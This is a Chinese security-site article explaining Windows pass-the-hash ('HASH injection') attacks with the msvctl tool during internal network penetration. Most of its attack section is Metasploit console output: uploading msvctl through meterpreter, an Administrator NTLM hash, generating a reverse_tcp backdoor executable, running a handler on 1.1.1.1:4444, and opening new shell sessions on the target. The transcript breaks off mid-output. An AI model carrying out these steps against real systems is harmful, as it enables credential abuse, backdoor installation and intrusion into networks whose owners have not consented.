热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

windows的HASH注入之msvctl

发布时间:2012-07-09 09:18文章来源:www.dis9.com文章作者:brk 点击次数:
摘要:前言 在windows 操作系统内网渗透的过程中,我们经常会碰上许多问题。 其中关于HASH这一块就比较多的问题,列如我们能够用常用的gsechash、gethashes等工具抓到windows的HASH散列值的话。也经常会有破解不了。 原因有二: 一、你的彩虹表字典进行暴力破解时...

 

前言

windows 操作系统内网渗透的过程中,我们经常会碰上许多问题。

其中关于HASH这一块就比较多的问题,列如我们能够用常用的gsechash、gethashes等工具抓到windows的HASH散列值的话。也经常会有破解不了。

原因有二:

  • 一、你的彩虹表字典进行暴力破解时字典内容不够强大;现如今网上流传的是120G的彩虹表,可供破解14位以内大部分密码HASH散列值。
  • 二、你所抓取的HASH散列原本就是错误的。

在碰到这种情况下,我们往往会想到的就是HASH注入攻击

HASH注入攻击是有很大的局限性的。

  • 一,拥有一台能够与你所攻击的机器进行网络共享的前提;
  • 二,必须拥有被攻击机器中用户的HASH散列值,如果你所拥有的机器上有一个帐户与被攻击帐号名密码是一样的情况下,可以尝试利用获取HASH散列的工具读取你本地HASH然后再进行攻击。
  • 三,必须拥有CMD交互式权限。因为进行HASH注入攻击的过程中会开启一个新的CMD SHELL。

我自已所架的模拟环境中测试过,在满足上面三个条情的情况下面才能够进行HASH注入攻击。

如果我们仅仅的是拥有一个以system权限值行的mssql进行内网渗透的话,完全没办法利用hash攻击;或者是我们用windows RPC溢出所获取的CMDSHELL进行HASH注入攻击也是不能够成功的。

其实,HASH注入攻击是非常简单的;我们只须要利用msvctl就能够开启新的继续权限的CMD SHELL进行攻击。

msvctl

我们在攻击过程中仅须要知道一个被攻击机器中用户的HASH散列值就可以进行攻击。
先获得权限和Hash

windows的HASH注入之msvctl


上传msvctl

meterpreter > upload /home/brk/file/msvctl/msvctl.exe msvctl.exe
[*] uploading  : /home/brk/file/msvctl/msvctl.exe -> msvctl.exe
[*] uploaded   : /home/brk/file/msvctl/msvctl.exe -> msvctl.exe
meterpreter > upload /home/brk/file/msvctl/msvctl.
msvctl.dll msvctl.exe 
meterpreter > upload /home/brk/file/msvctl/msvctl.dll msvctl.dll
[*] uploading  : /home/brk/file/msvctl/msvctl.dll -> msvctl.dll
[*] uploaded   : /home/brk/file/msvctl/msvctl.dll -> msvctl.dll
meterpreter >

取得SHELL 映射一个域的用户的C盘 提示无权限

windows的HASH注入之msvctl


我们进行域注入
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
上传一个DOOR

msf  payload(reverse_tcp) > generate -t exe -f /tmp/door.exe
[*] Writing 73802 bytes to /tmp/door.exe...
msf  payload(reverse_tcp) > use exploit/multi/handler 
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.
 
[*] Started reverse handler on 1.1.1.1:4444 
 [*] Starting the payload handler...
 
msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > upload /tmp/door.exe door.exe
[*] uploading  : /tmp/door.exe -> door.exe
[*] uploaded   : /tmp/door.exe -> door.exe
meterpreter >

注入测试

windows的HASH注入之msvctl


取得了新的会话 连接他

C:\windows\system32>exit
meterpreter > background 
[*] Backgrounding session 2...
 
msf > sessions -i 3
[*] Starting interaction with 3...
meterpreter > execute -f cmd.exe -i -c -H
Process 1312 created.
Channel 2 created.
Microsoft Windows XP [
          

标签分类: 注入 HASH msvctl

上一篇:Winodws陷阱设计思路
下一篇:使用hashcat GPU破解Hash密码